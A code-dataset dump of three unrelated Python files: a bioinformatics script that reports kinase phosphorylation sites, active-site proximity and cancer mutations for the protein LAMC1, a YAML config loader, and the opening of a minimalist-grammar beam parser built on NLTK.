output.write("\nAll Important residues for the predicted phosphorylation of {:s}: (Total={:d})\n".format(protein_name,len(All_important_residues)))
output.write(str(All_important_residues))
output.write("\n{:s}".format(underscore))
output.write("\nKinase's Binding Motifs in {:s}:\n".format(protein_name))
for a in Results:
motif_count=0
output.write("\n{:s}".format(dashes))
output.write("\n{:s} {:s} (Total motifs found={:d})\n".format(a.name,a.type, a.total_slims))
output.write("\n{:5s}{:s} (Total={:d})\n".format(" ","Phosphorylated Residues:",len(a.total_p_residues)))
ouf=" ["
for i in range(0,len(a.total_p_residues)):
ouf=ouf+str(a.total_p_residues[i])
if (i+1<len(a.total_p_residues)):
ouf=ouf+", "
ouf=ouf+"]"
output.write("{:5s}{:5s}\n".format(" ",ouf))
output.write("\n{:5s}{:s} (Total={:d})\n".format(" ","Important Residues:",len(a.total_i_residues)))
ouf=" ["
for i in range(0,len(a.total_i_residues)):
ouf=ouf+str(a.total_i_residues[i])
if (i+1<len(a.total_i_residues)):
ouf=ouf+", "
ouf=ouf+"]"
output.write("{:5s}{:5s}\n".format(" ",ouf))
output.write("\n\n{:5s} Motifs:\n".format(" "))
for b in a.Motifs:
output.write("\n{:8s}{:3d}) {:s} (Total={:d})\n".format(" ",motif_count+1,b.regex,b.M_slims))
motif_count=motif_count+1
slim_count=0
for c in b.Slims:
ouf1=""
for i in range(0,len(c.phospho_res)):
ouf1=ouf1+str(c.phospho_res[i])
if (i+1<len(c.phospho_res)):
ouf1=ouf1+", "
ouf2=""
for i in range(0,len(c.important_res)):
ouf2=ouf2+str(c.important_res[i])
if (i+1<len(c.important_res)):
ouf2=ouf2+", "
output.write("{:11s}{:3d}) {:5s} {:4d} - {:4d}: [Phosphorylated residue(s)= {:4s}] [Important residue(s)= {:4s}]\n".format(" ",slim_count+1,c.sequence,c.start,c.end,ouf1,ouf2))
slim_count=slim_count+1
output.write("\n{:13s}Motif's phosphorylated residues: (Total={:d})\n".format(" ",len(b.M_p_residues)))
ouf=" ["
for i in range(0,len(b.M_p_residues)):
ouf=ouf+str(b.M_p_residues[i])
if (i+1<len(b.M_p_residues)):
ouf=ouf+", "
ouf=ouf+"]"
output.write("{:13s}{:s}\n".format(" ",ouf))
output.write("\n{:13s}Motif's important residues: (Total={:d})\n".format(" ",len(b.M_i_residues)))
ouf=" ["
for i in range(0,len(b.M_i_residues)):
ouf=ouf+str(b.M_i_residues[i])
if (i+1<len(b.M_i_residues)):
ouf=ouf+", "
ouf=ouf+"]"
output.write("{:13s}{:s}\n".format(" ",ouf))
#motif_count=0 #set again in zero to count the next protein's motifs
output.write("{:s}\n".format(dashes))
print("Results written on ",outputname," file.")
else:
raise IOError("Output file ",outputname," not created")
output.close()
# ~ ~ for the second output file ~ ~
outputname=protein_name+"-Categorization_of_phosphorylations_comparatively_to_active_sites.txt"
with open (outputname, "w") as output:
if output:
print("\nFile ",outputname, "created.\n")
output.write("{:s}-Categorization of phosphorylated residues relatively to active sites \n(inside of, close to within six residues proximity and outside of active sites)\n".format(protein_name))
output.write("\n{:s}\n{:s}\n".format("Experimentally observed phosphorylated residues:",underscore))
output.write("Phosphorylated residues Inside Active sites: (Total={:d})\n".format(len(Exp_Inside)))
for i in Exp_Inside:
output.write("{:s}, ".format(i))
output.write("\n{:s}\n\nPhosphorylated residues Close within six residues proximity to Active sites: (Total={:d})\n".format(dashes,len(Exp_Close)))
for i in Exp_Close:
output.write("{:s}, ".format(i))
output.write("\n{:s}\n\nPhosphorylated residues Outside of Active sites: (Total={:d})\n".format(dashes,len(Exp_Outside)))
for i in Exp_Outside:
output.write("{:s}, ".format(i))
output.write("\n{:s}\n\n".format(underscore))
output.write("\n\n\n{:s}\n{:s}\n".format("Predicted observed phosphorylated residues:",underscore))
output.write("\nAll phosphorylated residues: (Total={:d})\n".format(len(All_phospho_residues)))
for i in All_phospho_residues_with_AA:
output.write("{:s}, ".format(i))
output.write("\n\n{:s}\nPhosphorylated residues Inside Active sites: (Total={:d})\n".format(dashes,len(inside)))
for i in assign_residues(inside,protein_sequence):
output.write("{:s}, ".format(i))
output.write("\n{:s}\n\nPhosphorylated residued Close within six residues proximity to Active sites: (Total={:d})\n".format(dashes,len(close)))
for i in assign_residues(close,protein_sequence):
output.write("{:s}, ".format(i))
output.write("\n{:s}\n\nPhosphorylated residued Outside of Active sites: (Total={:d})\n".format(dashes,len(outside)))
for i in assign_residues(outside,protein_sequence):
output.write("{:s}, ".format(i))
output.write("\n{:s}".format(underscore))
print("Results written on ",outputname," file.")
else:
raise IOError("Output file ",outputname," not created")
output.close()
# ~ ~ for the third output file ~ ~
outputname=protein_name+"-Link_ActiveSite_with_kinases.txt"
with open (outputname, "w") as output:
if output:
print("\nFile ",outputname, "created.\n")
output.write("{:s}\n".format(dashes))
for i in Results:
output.write("{:s} {:s}:\n".format(i.name,i.type))
output.write("\n{:5s}Phosphorylated residues Inside of Active sites: (Total={:d})\n{:5s}".format(" ",len(i.p_residues_inside)," "))
for a in assign_residues(i.p_residues_inside,protein_sequence):
output.write("{:s}, ".format(a))
output.write("\n\n{:5s}Phosphorylated residues Close to Active sites (within 6 residues proximity): (Total={:d})\n{:5s}".format(" ",len(i.p_residues_close)," "))
for a in assign_residues(i.p_residues_close,protein_sequence):
output.write("{:s}, ".format(a))
output.write("\n\n{:5s}Phosphorylated residues Outside of Active site: (Total={:d})\n{:5s}".format(" ",len(i.p_residues_outside)," "))
for a in assign_residues(i.p_residues_outside,protein_sequence):
output.write("{:s}, ".format(a))
output.write("\n{:s}\n\n".format(dashes))
print("Results written on ",outputname," file.")
else:
raise IOError("Output file ",outputname," not created")
output.close()
# ~ ~ for the fourth output file ~ ~
outputname=protein_name+"-Possily_responsible_kinases.txt"
with open (outputname, "w") as output:
if output:
print("\nFile ",outputname, "created.\n")
for i in Results_Exp_phosphp:
output.write("{:s}:\n".format(i.residue))
for a in i.responsible_kinases:
output.write("{:5s}{:s}\n".format("",a.name))
output.write("\n")
print("Results written on ",outputname," file.")
else:
raise IOError("Output file ",outputname," not created")
output.close()
return
def find_phosphorylations_inside(array):
    #finds the residues in the array argument that are inside of active sites, appends them to a list and returns that list.
inside_list=[]
for i in array:
for x in Active_sites:
if x.start<=i<=x.end: # residue is inside active sites
inside_list.append(i)
return inside_list
def find_phosphorylations_close(array, inside_list):
    #finds the residues in the array argument that are close within six residues proximity to active sites, appends them to a list and returns that list.
close_list=[]
for i in array:
if (i not in inside_list): #if residue is not inside then is either close to or outside of active sites
for x in Active_sites:
if (x.start-6<=i<x.start or x.end<i<=x.end+6): #residue close within 6 residues proximity to active sites
close_list.append(i)
return close_list
def find_phosphorylations_outside (array, inside_list, close_list):
    #finds the residues in the array argument that are outside of active sites, appends them to a list and returns that list.
outside_list=[]
for i in array:
if ((i in inside_list) or (i in close_list)):
pass
else: #residue not inside neither close to active sites, therefore residue is outside active sites
outside_list.append(i)
return outside_list
def categorize_phosphorylations_relatively_to_active_sites(all_phosphorylations):
    #categorizes the residues in all_phosphorylations into three lists (inside, close and outside) according to their location relative to active sites (inside active sites, close within 6 residues proximity to active sites and outside of active sites)
Inside=find_phosphorylations_inside(all_phosphorylations)
Close=find_phosphorylations_close(all_phosphorylations, Inside)
Outside=find_phosphorylations_outside(all_phosphorylations,Inside,Close)
return Inside,Close,Outside
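# Illustrative example: if Active_sites held a single active site spanning residues
# 100-120, then
#   categorize_phosphorylations_relatively_to_active_sites([95, 105, 123, 150])
# would return Inside=[105], Close=[95, 123] (within six residues of either end of the
# site) and Outside=[150].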
def link_kinases_with_active_sites(Results,inside,close,outside):
    #Splits the total_p_residues of each result_protein in Results into the three lists of that object that until now were empty.
    #The lists are p_residues_inside, p_residues_close and p_residues_outside and take the kinase's residues that are inside of, close to and outside of active sites, respectively.
for i in Results:
for x in i.total_p_residues:
if(x in inside):
i.p_residues_inside.append(x)
else: #x not inside so it is either close or outside of active sites
if (x in close):
i.p_residues_close.append(x)
else: #x not close so it is outside of active sites
if (x in outside):
i.p_residues_outside.append(x)
else:
print("Residue ",x," is not inside nor close nor outside of active sites!" )
return Results #returns again the Results but now the p_residues_inside, p_residues_close and p_residues_outside of each result_kinase in the Result are not empty but have values.
def find_responsible_kinases(Exp_phosph,Results):
#finds the possibly responsible kinases for the experimentally observed phosphorylations according to the predicted phosphorylated residues (total_p_residues attribute) of each result_protein object in Results.
Responsible_kinases=[] #buffer that contains all the kinases that could phosphorylate each residue. It takes result_kinase objects.
Results_Exp_phosph=[] #Has all the result_exp_phosph objects
for i in Exp_phosph:
residue_num=i[1:]
for a in Results:
if(len(a.total_p_residues)>0): #if the kinase is predicted to phosphorylate residues in the protein
if(int(residue_num) in a.total_p_residues):
Responsible_kinases.append(a)
Results_Exp_phosph.append(create_result_exp_phosph(i,Responsible_kinases))
Responsible_kinases=[] #empty list for the next Exp_phosph
return Results_Exp_phosph
def get_Mutations(TableFile):
#it parses an excel (.xlsx) file with mutations mined from CBioPortal. It only gets the point mutations.
Mutations=[] #List holding all the mutation objects
try:
wb=xlrd.open_workbook(TableFile)
sheet=wb.sheet_by_index(0)
try:
for i in range(sheet.nrows):
if ("Missense_Mutation" in sheet.row_values(i)): #only getting the Missense mutations and they result in a different amino acid. If a mutation is nonsense will result in the same amino acid that will not disturb the binding of kinases in the protein.
MutationType="Missense_Mutation"
if("deleterious" in sheet.cell_value(i,5)): #the column 5 should have this information in each row in the excel file
FuncImpact="deleterious"
if ("tolerated" in sheet.cell_value(i,5)): #the column 5 should have this information in each row in the excel file
FuncImpact="tolerated"
sampleID=str(sheet.cell_value(i,1)).strip()
cancerType=str(sheet.cell_value(i,2)).strip()
mutation= str(sheet.cell_value(i,3)).strip()
Mutation=create_AMutation(SampleID=sampleID, CancerType=cancerType, Mutation=mutation, FuncImpact=FuncImpact, MutationType=MutationType)
Mutations.append(Mutation)
#print(len(Mutations))
except:
print("\nSomething went wrong and could get the mutations.. Check the format of values of the excel file")
sys.exit() #telling to the user were the problem is, and quiting from the program
except:
print("\nSomething went wrong and could not open file... Check the format of the excel file with the mutations")
        sys.exit() #telling the user where the problem is, and quitting the program
return Mutations
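# Note on the expected spreadsheet layout (derived only from the cell indices used above;
# the example values are illustrative): a row is kept when one of its cells equals
# "Missense_Mutation"; column 1 holds the Sample ID (e.g. 'TCGA-XX-0001'), column 2 the
# Cancer Type, column 3 the protein change (e.g. 'S245F') and column 5 the functional
# impact (a string containing "deleterious" or "tolerated").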
def assignResidueToAS(my_mutation):
#assigns a mutation to an active site if it is inside or close to it, and if it is outside of all active sites it marks the mutation as outside of active sites
locationToAS=""
activeSite=""
#put the mutation in an array to give it as an argument to the function categorize_phosphorylations_relatively_to_active_sites
my_mutationArray=[]
my_mutationArray.append(int(my_mutation))
inside, close, outside= categorize_phosphorylations_relatively_to_active_sites(my_mutationArray)
    #because my_mutationArray has only one value, only one of the arrays inside, close, outside will have length 1 and the other two will have length 0. The array with length 1 shows the location of the mutation relative to active sites
if (len(outside)>0): #mutation is outside
locationToAS="Outside"
activeSite="-"
elif (len(close)>0):
locationToAS="Close" #mutation is close
for i in Active_sites:
if((int(i.start)-6<=int(my_mutation)<int(i.start)) or (int(i.end)<int(my_mutation)<=int(i.end)+6)):
activeSite= str(i.start) + "-" + str(i.end)
break
elif (len(inside)>0): #mutation is inside
locationToAS="Inside"
for i in Active_sites:
if(int(i.start)<=int(my_mutation)<=int(i.end)): #mutation is inside an active site
activeSite= str(i.start) + "-" + str(i.end)
break
else:
print("Something went wrong. A mutation should either be inside, close to or outside of an active site.")
return locationToAS,activeSite
def mutationExists(mutation_entry, array):
#finds if a mutation entry already exists in an array
status="does not exist"
for i in array: # two mutation entries are considered the same if they have the same Mutation value, the same SampleId value and the same Cancer type value.
if (i.Mutation==mutation_entry.Mutation):
if(i.SampleID==mutation_entry.SampleID):
if(i.CancerType==mutation_entry.CancerType):
status="exists"
return status
def only_keep_unique_mutations (Result_Mutations):
#it keeps only the unique entries of the Result_Mutations array and returns a new array with only the unique mutations
new_array=[]
i=0
new_array.append(Result_Mutations[i])
for x in range(i+1,len(Result_Mutations)):
if(mutationExists(Result_Mutations[x],new_array)=="does not exist"):
new_array.append(Result_Mutations[x])
return new_array
def find_Mutations(Results,MutationList,protein_name):
All_important_residues=merge_important_residues(Results)
Result_Mutations=[]
for i in MutationList:
my_mutation=str(i.Mutation[1:len(i.Mutation)-1])
dResidue=""
dKinase=""
locationAS=""
AS=""
dPlaces=[]
for x in All_important_residues:
#if mutation is in All_important_residues [important residues include phosphorylated residues]
if (str(my_mutation)==str(x)):
                #then search for which kinase it is an important residue.
for a in Results:
for y in a.total_i_residues:
if(str(my_mutation)==str(y)):
dKinase=a.name
dResidue="important residue"
#search if mutation is in total_p_residues because then it would be disturbing a phosphorylated residue
for y in a.total_p_residues:
if(str(my_mutation)==str(y)):
dResidue="phosphorylated residue"
dPlaces.append(create_dPlace(dKinase,dResidue))
break
locationAS,AS=assignResidueToAS(my_mutation)
Result_Mutations.append(create_result_mutation(i.SampleID, i.CancerType, i.Mutation, i.FuncImpact, i.MutationType, locationAS, AS, dPlaces))
Result_Mutations=only_keep_unique_mutations(Result_Mutations)
print_mutations_Results(Result_Mutations,protein_name)
return
def print_mutations_Results(Result_Mutations,protein_name):
# ~ ~ for the fifth output file ~ ~
outputname=protein_name+"-Mutations_disturbing_Phosphorylations.xls"
try:
wb=xlwt.Workbook(encoding = 'ascii')
sheet=wb.add_sheet("Missense Mutations")
sheet.write(0,0,"Sample ID")
sheet.write(0,1,"Cancer Type")
sheet.write(0,2,"Mutation")
sheet.write(0,3,"Amino Acid Change")
sheet.write(0,4,"Functional Impact")
sheet.write(0,5,"Location to AS")
sheet.write(0,6,"Active Site (AS)")
sheet.write(0,7,"No. disturbed Kinases")
sheet.write(0,8,"disturbed Kinases")
sheet.write(0,9,"disturbed Residue")
rowindex=1
for i in Result_Mutations:
sheet.write(rowindex,0, i.SampleID)
sheet.write(rowindex,1, i.CancerType)
mutation=str(i.Mutation[1:len(i.Mutation)-1])
sheet.write(rowindex,2, mutation)
aaChange=str(i.Mutation[0]+" -> "+i.Mutation[-1])
sheet.write(rowindex,3, aaChange)
sheet.write(rowindex,4, i.FuncImpact)
sheet.write(rowindex,5, i.locationAS)
sheet.write(rowindex,6, i.AS)
sheet.write(rowindex,7, len(i.dPlaces))
increase=0
for x in i.dPlaces:
sheet.write(rowindex,8+increase, x.kinase)
sheet.write(rowindex,9+increase, x.residue)
increase=increase+2
rowindex=rowindex+1
wb.save(outputname)
print("Results written on ",outputname," file.")
except:
print("\nSomething went wrong and could write result mutations in an excel file...")
sys.exit() #telling to the user were the problem is, and quiting from the program
return
def search_in_protein(protein_sequence):
    #one function that does it all. Gets the sequence, finds the motifs of all kinases in the sequence, categorizes the phosphorylated residues according to their position relative to active sites, links the kinases with active sites, finds the possibly responsible kinases for the experimentally observed phosphorylations and sends all the results for writing to output files.
seq=get_sequence(protein_sequence)
protein_name=protein_sequence.split(".",1)
protein_name=str(protein_name[0])
Results=find_motifs_for_all_proteins(All_proteins,seq)
Inside,Close,Outside=categorize_phosphorylations_relatively_to_active_sites(merge_phospho_residues(Results))
#in the "new" Results the p_residues_inside,p_residues_close and p_residues_outside arguments are not empty lists but contain the kinase's residues that are inside, close and outside of active sites, correspondingly.
Results=link_kinases_with_active_sites(Results,Inside,Close,Outside)
Results_Exp_phosphp=find_responsible_kinases(Exp_Phosph,Results)
Exp_Inside, Exp_Close, Exp_Outside=categorize_phosphorylations_relatively_to_active_sites(de_assign_residues(Exp_Phosph))
    #assign residues to them again for writing
Exp_Inside=assign_residues(Exp_Inside,seq)
Exp_Close=assign_residues(Exp_Close,seq)
Exp_Outside=assign_residues(Exp_Outside,seq)
    #send it all for writing to a file
print_results(Results,protein_name,seq,Inside,Close,Outside,Results_Exp_phosphp,Exp_Inside,Exp_Close,Exp_Outside)
find_Mutations(Results,MutationList,protein_name)
return
# ~ END functions ~ #
# ~ Main ~ #
##Inform user for the origin, function and requirments of the code
print("\nThis code is a modification of the PhosphoKin tool \n(Galliou, P.A., Verrou, K.M., 2019. An in silico method for studying the phosphorylation in association to active sites. Aristotle Biomedical Journal 1, 48–59). \n")
print("This code was implemented by Galliou Panagiota-Angeliki (email: ag.gal.work@gmail.com).\n")
print("Briefly, the PhosphoKin tool predicts phosphorylation sites and phosphorylated residues in a protein sequence based on kinase binding motifs.\n")
print("This code, modified the PhosphoKin tool to read cancer mutations found in the protein sequence and identify those deleterious missense point mutations that could obstruct the predicted phosphorylation of the protein according to the kinases' binding motifs, by either occuring directly on a predicted phosphorylated residue or occuring on required residues for kinase binding in a phosphorylation site.")
print("\nThe code takes 5 files as input: \n 1) A file with the active sites of the protein.\n 2) A file with the experimentally observed phosphorylated residues in the protein.\n 3) A file with the motif(s) of kinases(s) for which the user wants to find binding sites in the protein sequence.\n 4) A file with the sequence of the protein in a fasta format.\n 5) An xlsx file (excel) with the mutations of the protein that have been found in all types of cancer as downloaded from CBioPortal.\n")
print("The code creates 5 output files: \n 1) A file that shows the phosphorylation sites and phosphorylated residues for each given motif of each given protein.\n 2) A file that categorizes the phosphorylated residues in the protein according to their position relatively to the active sites of the protein.\n 3) A file that links the given kinases with the active sites of the protein.\n 4) A file that shows the possibly responsible kinase(s) for each experimentally observed phosphorylated residue in the protein.\n 5) An excel file with those missense point mutations found in the protein in cancer patients that could obstruct the protein's predicted phosphorylation either by occuring on the very exact amino acid that the kinase could phosphorylate or by occuring on the required surrounding residues for kinase binding to the phosphorylation site, according to kinases' motifs.\n")
print("The name of the above 5 output files are:\n 1) LAMC1-Kinases_Motifs.txt \n 2) LAMC1-Categorization_of_phosphorylations_comparatively_to_active_sites.txt \n 3) LAMC1-Link_ActiveSite_with_kinases.txt \n 4) LAMC1-Possily_responsible_kinases.txt \n 5) LAMC1-Mutations_disturbing_Phosphorylations.xls\n")
print("The 5 input files used by this code are uploaded in the following link:\nhttps://www.dropbox.com/sh/5p0b4fkri1uisbl/AABm9MqYvhaxEinaPKVTgfMGa?dl=0\n\nFor details on the format of the first 4 files, please refer to the manuscript of PhosphoKin Tool \n(Galliou, P.A., Verrou, K.M., 2019. An in silico method for studying the phosphorylation in association to active sites. Aristotle Biomedical Journal 1, 48–59).\n\nThe 5th input file should be formated as the LAMC1-Mutations.xlxs file in the above link \n(https://www.dropbox.com/s/e2paiz1jvhc8t07/LAMC1-Mutations.xlsx?dl=0).\n")
print("The input files should be in the same directory as the code upon running. \nThe output files are created in the directory of the code upon running.\n\n")
print("\n------------------------------------------------------------------\n\n")
"""
## Take the names of the required files as input from the user.
print("[ATTENTION: Please read the manual to make sure what format the required files should have.]\n")
### ~ ~ ~ Asking from user files and opening each file ~ ~ ~ ###
print ("\nNow, I would like you to give me the 5 files.\n ")
###Asking for the active sites
active_sites_file=input("\nGive the Active file, please: ")
if active_sites_file == 'help':
print("\nThe file must have the following format:\n Start_of_active_site_1 - End_of_active_site_1, Start_of_active_site_2 - End_of_active_site_2, etc \n e.g. 13-22, 150-162, 1147-1458, etc\n")
active_sites_file=input("\nGive the Active Sites file, please: ")
try:
#active_sites_file = "Active_sites.txt"
Active_sites=get_active_sites(active_sites_file) #Holds all the active site objects
except:
print("\nSomething went wrong... Check the format of the Active Sites file")
sys.exit() #telling the user where the problem is and quitting the program
###Asking for the experimentally observed phosphorylated residues
exp_phospho_file=input("\nGive the Experimentally observed phosphorylated residues in the protein file, please: ")
if exp_phospho_file == 'help':
print("\nThe file must have the following format:\n phosphorylated_residue_1, phosphorylated_residue_2, phosphorylated_residue_3, etc..\n e.g S4, S156, T445, etc \n ")
exp_phospho_file=input("\nGive the Experimentally observed phosphorylated residues in the protein file, please: ")
try:
Exp_Phosph=get_exp_phosph_residues(exp_phospho_file) #Holds all the experimentally observed phosphorylated residues as strings
except:
print("\nSomething went wrong... Check the format of the Experimentally observed phosphorylated residues in the protein file")
sys.exit() #telling the user where the problem is and quitting the program
###Asking for the Motifs
motifs_file=input("\nGive the Motifs file, please: ")
if motifs_file == 'help':
print("\nThe file must have the following format: \n Name_of_kinase_1[space]protein type: motif_1, motif_2, motif_3, etc [enter] Name_of_kinase_2[space]protein type: motif_1,motif_2, etc [enter]\n H1K Kinase:[pS/pT]P[R/K]-[pS/pT]PX[R/K]-[R/K][pS/pT]P \nATM Kinase:pSQ-[P/L/I/M]X[L/I/E/D]pSQ-LpSQE\n")
motifs_file=input("\nGive the Motifs file, please: ")
try:
All_proteins=[] # Holds all the protein objects.
All_proteins=get_motifs(motifs_file)
except:
print("\nSomething went wrong... Check the format of the Motifs file")
sys.exit() #telling the user where the problem is and quitting the program
###Asking for the Mutations
mutations_file=input("\nGive the Mutations file, please: ")
if mutations_file == 'help':
print("\nThe file must have the format as downloaded by CBioPortal \n [The columns should be in the following order: Sample ID, Cancer Type, Protein Change, Annotation, Functional Impact, Mutation Type, Copy, COSMIC, MS, VS, Center, Chromosome, Start Pos, End Pos, Ref, Var, Allele Freq (T), Allele Freq (N), Variant Reads, Ref Reads, Variant Reads (N), Ref Reads (N), # Mut in Sample] ")
mutations_file=input("\nGive the Mutations file, please: ")
try:
MutationList=[] # Holds all the protein objects.
MutationList=get_Mutations(mutations_file)
except:
print("\nSomething went wrong... Check the format of the Mutations file")
sys.exit() #telling the user where the problem is and quitting the program
###Asking for the Sequence
sequence_file=input("\nGive the Protein Sequence file, please: ")
if sequence_file == 'help':
print("\nThe file must have a fasta format (https://en.wikipedia.org/wiki/FASTA_format).\n ")
sequence_file=input("\nGive the Protein Sequence file, please: ")
try:
search_in_protein(sequence_file)
except:
print("\nSomething went wrong... Check the format of the Sequence file")
sys.exit() #telling the user where the problem is and quitting the program
print("\n\n------------------------------------------------------------------\n\n")
"""
##Taking the input files.
Active_sites=get_active_sites("LAMC1-Active_Sites.txt") #Takes the file with the active sites as input
Exp_Phosph=get_exp_phosph_residues("LAMC1-Experimentally_Observed_Phosphorylations.txt") #Takes the file with the experimentally observed phosphorylations as input
All_proteins=[] # Holds all the protein objects.
All_proteins=get_motifs("LAMC1-Kinase_Motifs.txt") #Takes the file with the kinases' recognition motifs as input
MutationList=get_Mutations("LAMC1-Mutations.xlsx") #Takes the file with the cancer mutations in the protein as input
search_in_protein("LAMC1.txt") #Takes the file with the protein sequence as input
# ~ END Main ~ #
| 51.559853 | 890 | 0.652713 |
3dbcc01b58fbaf96d5eea9d5027e91d1db314a29 | 269 | py | Python | config.py | edubarbieri/ddm | 0275ff7df3074631d9220725bd12b2becd963e1c | [
"MIT"
] | null | null | null | config.py | edubarbieri/ddm | 0275ff7df3074631d9220725bd12b2becd963e1c | [
"MIT"
] | 2 | 2021-03-25T22:20:12.000Z | 2021-06-01T23:10:13.000Z | config.py | edubarbieri/ddm | 0275ff7df3074631d9220725bd12b2becd963e1c | [
"MIT"
] | null | null | null | import yaml
config = {}
# read config file
with open("config.yml", 'r') as stream:
try:
config = yaml.safe_load(stream)
except yaml.YAMLError as exc:
print("Error reading config file: ", exc)
exit(1)
def get_config():
return config
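# Minimal usage sketch (added; the key names below are only an illustration,
# not part of the original config.yml):
#   from config import get_config
#   cfg = get_config()
#   db_host = cfg.get('database', {}).get('host')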
| 20.692308 | 49 | 0.624535 |
dcd655741a401bb95fab9902d11a17f683a2649e | 45,201 | py | Python | python/mgtdbp.py | epstabler/mgtdb | 41e0018a2aebee90a5bdafe21dfac8d743aca4a7 | [
"Apache-2.0"
] | 9 | 2015-07-26T23:09:34.000Z | 2021-01-20T23:54:55.000Z | python/mgtdbp.py | epstabler/mgtdb | 41e0018a2aebee90a5bdafe21dfac8d743aca4a7 | [
"Apache-2.0"
] | null | null | null | python/mgtdbp.py | epstabler/mgtdb | 41e0018a2aebee90a5bdafe21dfac8d743aca4a7 | [
"Apache-2.0"
] | 7 | 2015-07-20T16:46:03.000Z | 2021-08-14T02:01:17.000Z | """
file: mgtdbp.py
minimalist grammar top-down beam parser, development version.
This is a working, development version, with print routines and examples.
Using NLTK installed under Python 2.7, you can start the read-parse loop by
typing, in a terminal window:
python mgtdbp.py grammar startCategory minimumProbability
For example:
python mgtdbp.py mg0 C 0.0001
(For line mode editing, I start the loop with: rlwrap python mgtdbp.py)
The loop is started by the command at the bottom of this file.
Python will prompt you for a sentence to parse with the grammar specified
in that line.
If the grammar is mg0, for example, you could type one of:
the king prefers the beer
which queen says the king knows which wine the queen prefers
Then you will be given a prompt to which you can type
h
to get a list of the options.
This file extends mgtdb-dev.py to a parser, by keeping a tree in each
partial analysis. Note that, although this is a TD parser, derivation
nodes are not expanded left-to-right in the standard, so we record
the left-right order of each node with indices (similar to indexing of
predicted cats).
To each indexed category (iCat) we add its own dtree node index,
and we also add a list of the features checked in its own
projection so far.
To each derivation (der) we add its list of indexed category dtree node
indices. In each step of the derivation, we extend the parents node index,
putting the results into the derivation list, and in the
respective children.
So each indexed category ic = (i,c,dt) where dt is a "dtuple", that is:
(Fs checked so far, index of current node, array of Fs moving elements).
Here, dtuples are never checked during the parse, but they could be used
to influence probability assignments at each step.
For the moment, we compute just the most probable parse,
using a uniform distribution at each choice point,
returning the derivation (as a "dnode list", or else error,
instead of just true or false as the recognizer does.
TODO: implement more sophisticated pruning rule (cf Roark) and more
sophisticated determination of which trees should be returned.
* For cats that lack subtrees in lex, tA is not set. This does not matter,
but we could probably get rid of tA altogether.
* sA sets all features, but lA only needs non-empty lexTrees.
* We might speed things up by numbering all subtrees of the lexArray,
and using int list arrays to encode the whole lexTree.
Comments welcome: stabler@ucla.edu
"""
import sys
from nltk.util import in_idle
from nltk.tree import Tree
from nltk.draw import *
import heapq
import time
"""
We represent trees with lists, where the first element is the root,
and the rest is the list of the subtrees.
First, a pretty printer for these list trees:
"""
def pptreeN(n,t): # pretty print t indented n spaces
if isinstance(t,list) and len(t)>0:
sys.stdout.write('\n'+' '*n+'[')
print(t[0]), # print root and return
if len(t[1:])>0:
sys.stdout.write(',') # comma if more coming
for i,subtree in enumerate(t[1:]): # then print subtrees indented by 4
pptreeN(n+4,subtree)
if i<len(t[1:])-1:
sys.stdout.write(',') # comma if more coming
sys.stdout.write(']')
else:
sys.stdout.write('\n'+' '*n)
print(t),
def pptree(t):
if len(t)==0: # catch special case of empty tree, lacking even a root
sys.stdout.write('\n[]\n')
else:
pptreeN(0,t)
sys.stdout.write('\n')
"""
example:
pptree([1, 2, [3, 4], [5, 6]])
pptree(['TP', ['DP', ['John']], ['VP', ['V',['praises']], ['DP', ['Mary']]]])
I have intentionally written this prettyprinter so that the
prettyprinted form is a well-formed term.
"""
"""
We can convert a list tree to an NLTK tree with the following:
"""
def list2nltktree(listtree):
if isinstance(listtree,tuple): # special case for MG lexical items at leaves
return (' '.join(listtree[0]) + ' :: ' + ' '.join(listtree[1]))
elif isinstance(listtree,str): # special case for strings at leaves
return listtree
elif isinstance(listtree,list) and listtree==[]:
return []
elif isinstance(listtree,list):
subtrees=[list2nltktree(e) for e in listtree[1:]]
if subtrees == []:
return listtree[0]
else:
return Tree(listtree[0],subtrees)
else:
raise RuntimeError('list2nltktree')
"""
With an NLTK tree, we can use NLTK tree display:
list2nltktree(t).draw()
TreeView(t)
"""
"""
OK, we now begin implementing the beam parser.
We will number the categories so that we have only integer comparisons
at runtime, and we can use those integers as position indices.
The human readable form of the grammar:
mg0 = [ ([],[('sel','V'),('cat','C')]),
([],[('sel','V'),('pos','wh'),('cat','C')]),
(['the'],[('sel','N'),('cat','D')]),
(['which'],[('sel','N'),('cat','D'),('neg','wh')]),
(['king'],[('cat','N')]),
(['queen'],[('cat','N')]),
(['wine'],[('cat','N')]),
(['beer'],[('cat','N')]),
(['drinks'],[('sel','D'),('sel','D'),('cat','V')]),
(['prefers'],[('sel','D'),('sel','D'),('cat','V')]),
(['knows'],[('sel','C'),('sel','D'),('cat','V')]),
(['says'],[('sel','C'),('sel','D'),('cat','V')])
]
"""
"""
It will be good practice to print out those grammars in slightly
more readable forms, using the following functions:
"""
def btfyFtype(t):
if t=='cat':
return ''
elif t=='sel':
return '='
elif t=='neg':
return '-'
elif t=='pos':
return '+'
else:
raise RuntimeError('btfyFtype('+str(t)+')')
def btfyFeat((ftype,f)):
result = btfyFtype(ftype) + f
return result
def btfyLexItem((s,fs)):
fstrings = []
for f in fs:
fstrings.append(btfyFeat(f))
result = ' '.join(s) + '::' + ' '.join(fstrings)
return result
def showGrammar(g):
for item in g:
print(btfyLexItem(item))
"""
example: showGrammar(mg0)
"""
"""
Now we begin building the lexical representation of the grammar
as a tree (actually, as a list of trees)
"""
def ensureMember(e,l):
if e in l:
return l
else:
return l.append(e)
"""
example: ensureMember(2,[1,3])
example: ensureMember(2,[1,2])
"""
def stringValsOfG(g): # the string values of the features
sofar = []
for (ss,fs) in g:
for (ftype,fval) in fs:
ensureMember(fval,sofar)
return sofar
"""
example
sA0 = stringValsOfG(mg0)
sA2 = stringValsOfG(mg2)
"""
def listNth(e,l): # return (first) position of e in l
return l.index(e)
def intsOfF(sA,(ftype,fval)): # convert string representation of feature to integer pair
if ftype=='cat':
return (0,listNth(fval,sA))
elif ftype=='sel':
return (1,listNth(fval,sA))
elif ftype=='neg':
return (2,listNth(fval,sA))
elif ftype=='pos':
return (3,listNth(fval,sA))
else:
raise RuntimeError('error: intsOfF')
"""
intsOfF(sA0,('sel','N'))
"""
def fOfInts(sA,(itype,ival)): # convert int representation back to string pair
if itype==0:
return ('cat',sA[ival])
elif itype==1:
return ('sel',sA[ival])
elif itype==2:
return ('neg',sA[ival])
elif itype==3:
return ('pos',sA[ival])
else:
raise RuntimeError('error: fOfInts')
"""
fOfInts(sA0,(1,1))
btfyFeat(fOfInts(sA0,(1,1)))
"""
"""
To make building the tree representation of the grammar straightforward,
we reverse features lists and convert them to integers first
"""
def revItem (sl, (ss,fs)):
